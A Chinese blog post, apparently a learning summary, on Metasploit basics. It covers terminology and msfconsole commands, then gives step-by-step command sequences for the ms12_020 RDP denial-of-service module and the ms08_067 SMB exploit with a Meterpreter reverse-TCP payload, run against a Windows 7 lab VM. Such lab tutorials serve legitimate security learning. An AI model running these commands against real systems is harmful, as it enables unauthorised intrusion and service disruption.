Metasploit学习总结

最新推荐文章于 2024-01-04 15:10:13 发布
原创 最新推荐文章于 2024-01-04 15:10:13 发布 · 978 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍Metasploit渗透测试框架的基础使用,包括攻击载荷、shellcode、模块及监听器的概念,通过具体示例展示如何利用Metasploit对Windows系统进行攻击,获取shell并上传文件,同时探讨了攻击失败的可能原因。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Metasploit学习总结

最近需要利用metasploit工具找到”针对win732攻击成功、拿到shell并且能够上传文件“的exploit。实现过程中对Metasploit框架有所了解,总结如下。

METASPLOIT基础入门

Metasploit的基本使用

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。Metasploit中已经有很多已有的Exploit,他向外部提供使用接口,使用户可以在不了解漏洞原理以及shellcode的情况下对靶机进行目标测试。

0.平台环境

可以在Linux、Windows和Mac OS X系统上运行。本人使用的是Kali,Kali中对Metasploit工具已经有了集成。

本人实现过程中是使用的是Kali和win732。Metasploit安装在Kali中,试图攻击win732系统。其中Kali和win732都是Vmware中的虚拟机,将两个系统的虚拟机网络配置设置为 NAT模式 。

攻击机:Kali

靶机:win732

1.名词解释

Metasploit工具接口:图形用户界面接口:Armitage;命令行接口:msfconsole。

渗透攻击(Exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。

攻击载荷(Payload),是我们期望目标系统在被渗透攻击之后去执行的代码。

Shellcode,是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写。

模块(Module),指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作。

监听器(Listener),是Metasploit中用来等待网络连接的组件。

2.使用步骤

使用metasploit的基本步骤:

  • 运行msfconsole
  • 确定远程主机
  • 找到一个漏洞并使用这个漏洞
  • 配置漏洞选项
  • 入侵远程主机
3.基本命令

help

search

search <search operator>:<search term>
msf-pro > search platform:Windows
msf-pro > search type:exploit
msf-pro > search author:hd
msf-pro > search app:client
msf-pro > search name:ms08-067

show

show exploits
show missing	#To find out what options are required, you can use the show missing command.
show targets	#to view a list of potentially vulnerable targets.

set

set target 	#command to specify a target for the exploit.
set RHOST 192.168.55.1

其他

exploit or run	#command to run an exploit module.
back 	#command to reset the command prompt and to remove the module that is currently loaded.
reload	#command to refresh the metadata and methods for an exploit.
background(进程隐藏至后台)
sessions(查看已经成功获取的会话,-i 恢复会话)
quit(关闭当前会话)
shell (获取系统控制台shell,如果目标系统命令行可执行程序不存在或禁止访问, 则shell命令会出错)
irb(与Ruby终端交互,调用metasploit封装好的函数;在irb中还可以添加metasploit附加组件railgun,直接与windows本地API进行交互)
info #查看某个模块的相关信息,比如是否支持某个平台、模块使用条件等
4.使用样例解释
#查找模块中含有ms12-020的模块
search ms12-020
#利用该模块进行攻击
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
#查看需要填写的参数
show options 
#填写需要写的参数
set RHOST 192.168.116.129
执行auxiliary攻击模块
run/exploit

#使用search功能搜索ms08-067
search ms08-067
#使用use命令选定要利用的模块
use exploit/windows/smb/ms08_067_netapi
#设置攻击载荷;从目标主机发起一个反弹连接
set PAYLOAD windows/meterpreter/reverse_tcp
#使用show targets命令让我们识别和匹配目标操作系统的类型
show targets
#选定系统编号(TARTGET),设置靶机IP(RHOST)与本机IP(LHOST)
set TARGET 17
set RHOST 192.168.116.129
set LHOST 192.168.116.128
#使用“show options”命令查看当前参数设置情况
show options 
#参数检查无误后,输入“exploit”对靶机进行攻击。当返回meterpreter提示符表示利用成功。
run/exploit
5.渗透攻击失败可能的原因

  • 网络连接:攻击机和靶机之间网络不相连,要保证两台虚机之间能互相ping通

  • 靶机的一些权限设置:防火墙、远程桌面功能等

  • 版本一致性:exploit以及shellcode都是针对特定系统/软件版本的漏洞和shellcode,要与info、漏洞信息以及shellcode中的源码中实现的版本保持一致

学习metasploit漏洞总结
NS的博客
10-26 2338
学习metasploit漏洞利用总结(一)实验准备 vm虚拟机 kali 以及目的主机,我选取的是xp系统。这里可以将xp系统的防火墙关掉,或者找专门做靶机的系统。安装过程在这里不过多叙述,我的安装道路非常坎坷,有时间会总结成另一篇文,这里就先总结开始学习的一部分。 1.打开两个系统,查询他们的ip地址,互相ping,看是否可以ping通,如果ping通可以继续下面的操作。 这里面在k
Metasploit Framework 总结
code_lab
07-02 787
2.Metesploit Framework 基础知识调用 exploit漏洞用use 使用payload用set 参数也是用set启动: 命令行输入:msfconsole 命令行输入:msfcli +参数 图形化界面输入:armitage 3.实例讲解1 ms10_046快捷方式图标漏洞命令行msfconsole use exploit/windows/browser/ms10_046_sh
metasploit 使用心得笔记
06-10
metasploit是最好的渗透框架之一,在、更为给力的是这个框架是免费使用的,所以对于网络安全爱好者而言是个不错的框架。所以传了这个使用心得,方便大家对metasploit的使用
metasploit 学习
长夜大雨
11-30 473
1. 网络安全虚拟靶机环境搭建   http://www.freebuf.com/articles/system/34571.html  2. kali & bt http://www.kali.org.cn
Metasploi framework介绍与下载(5.0.49版本)
weixin_42499942的博客
09-20 1031
Metasploit介绍与下载(5.0.49版本) 一、介绍: Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚...
Metasploit 学习 指南— 基础篇
12-23
Author:阿德马 ...Metasploit 是一款强大的渗透测试平台,其中包括了很多渗透测试利器,本文简单介绍一下 Metasploit 的配置和基础的使用方法,主要包括以下几个方面: 网上朋友总结的,在此谢过!讲述kali linux
Metasploit 学习指南
08-26
### Metasploit 学习指南 #### 一、概述与基础知识 Metasploit是一款功能强大的渗透测试框架,被广泛应用于安全审计、漏洞评估以及红队行动中。它可以帮助安全专家发现系统中的潜在威胁,并通过模拟攻击来验证这些...
metasploit-framework-6.4.12.zip
最新发布
06-23
总结,Metasploit Framework 6.4.12 是一款强大且灵活的渗透测试工具,通过不断迭代和更新,它在帮助安全专业人员发现和修复漏洞方面发挥着重要作用。理解并掌握 Metasploit 的使用,不仅可以提升测试效率,还能更好...
metasploit使用总结
醉等佳人归
07-19 537
文章目录1.信息收集模块2.密码破解模块3.漏洞利用模块4.shellcode使用及免杀4.1.windows4.2.linux4.3.Android4.4.java4.5.php4.6.免杀5.meterpreter使用5.1.持久化控制PC(APT) 1.信息收集模块 2.密码破解模块 3.漏洞利用模块 4.shellcode使用及免杀 msfvenom 取代了 msfpayload命令 4.1.windows 4.2.linux 4.3.Android 4.4
【记录】metasploit总结
weixin_30608503的博客
11-17 115
sessions -l 查看会话 backgroud 暂时退出当前会话 注入进程: ps 查看进程migrate 注入进程 进程ID 一般选择explorer.exe对应的PID run vnc 查看远程桌面 文件操作cat 查看文件edit 编辑文件upload 上传文件download 下载文件rm 删除文件mkdir 创建文件夹rmdir 删除文件夹 网络及系统操作enumdeskt...
Metasploit学习
weixin_30607659的博客
09-03 208
使用Metasploit进行信息收集 启动Metasploit: msfconsole 使用nmap nmap相关参数: -sL:简单列表扫描 -sn:扫描主机,但是不进行端口扫描 -sS:TCP SYN扫描【半开放扫描,扫描速度高且隐蔽性好】 -p |-F:扫描端口列表与扫描次序,常用的扫描方式【-p指定端口|-F执行快速扫描】 -sV:服务,...
Metasploit学习-1
seeicb的博客
03-06 509
title: Metasploit学习-1 date: 2018-03-14 21:17:37 categories: 安全 tags: [Metasploit,工具] Metasploit 介绍 Metasploit是一个漏洞利用框架,全称The Metasploit Framework,简称MSF。 msf包括各种模块,插件,和第三方工具。如msfvenom,db_nmap,db_sqlm...
Metasploit入门基础知识总结
Deeeelete的博客
02-18 866
基本信息: 以前用 Metasploit的时候都是无脑的照着操作,虽然只要操作无误就可以实现效果,但这种方式也只是知其果,不知其因果,这样做不系统,也不全面,所以通过学习就把 Metasploit的基础知识又整理了一下。 Metasploit 渗透测试框架有着核心的三个库:Rex、framework-core 、framework-base。这些库对框架本身提供了最基础最底层的一些环境依赖,...
Metasploit工具学习(一)
weixin_37879065的博客
04-22 2366
Metasploite工具学习简介安装核心模块常用命令永恒之蓝ms17_010实例 简介 Metasploite是由Rapid7开始的一个计算机安全项目,最著名的是其中一个子项目Metaploite Framework,这是一种用于针对远程目标机器执行漏洞利用代码的攻击框架。 安装 kali系统自带,安装方式自行百度 核心模块 Auxiliary:核心辅助模块 主要是扫描爆破,不会建立连接 E...
Metasploit学习Metasploit基础
习惯积淀的博客
01-01 696
文章目录专业术语渗透攻击(Exploit)攻击载荷(Payload)Shellcode模块(Module)监听器(Listener)Metasploit用户接口MSF终端MSF命令行ArmitageMetasploit功能程序MSF攻击载荷生成器MSF编码器Metasploit Express和Metasploit Pro 专业术语 渗透攻击(Exploit) 渗透攻击是指由攻击者或渗透测试者利...
Metasploit渗透测试 学习路线
Festinatione facit vastum
08-03 1907
Metasploit渗透测试 学习路线同步记录学习参考:《Metasploit渗透测试魔鬼训练营》在刚开始接触信息安全的时候,看了一些入门的书籍,从懵懂到懵逼,从没想过一个学科会分这么多的方面,偶然间看到了一本书《Metasploit渗透测试魔鬼训练营》,抱着尝试的心态,静下心来进行学习,希望有所收获!Day1:了解学习资料
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
VN520的博客
01-04 1183
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
metasploit方法总结,kali官方工具使用示例
weixin_45018333的博客
03-12 244
http://www.itkeyword.com/doc/5788362998684252552/kali-hacker-metasploit 各种metasploit总结! https://tools.kali.org/tools-listing kali官方工具使用示例
Metasploit漏洞利用基础教程详解
通过这些案例,用户可以学习如何使用Metasploit进行漏洞利用,以及在真实环境中的应用。 #### 10. Metasploit的未来发展方向 Metasploit不断更新和改进,以适应新的安全威胁和挑战。安全研究者和开发人员都在不断...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值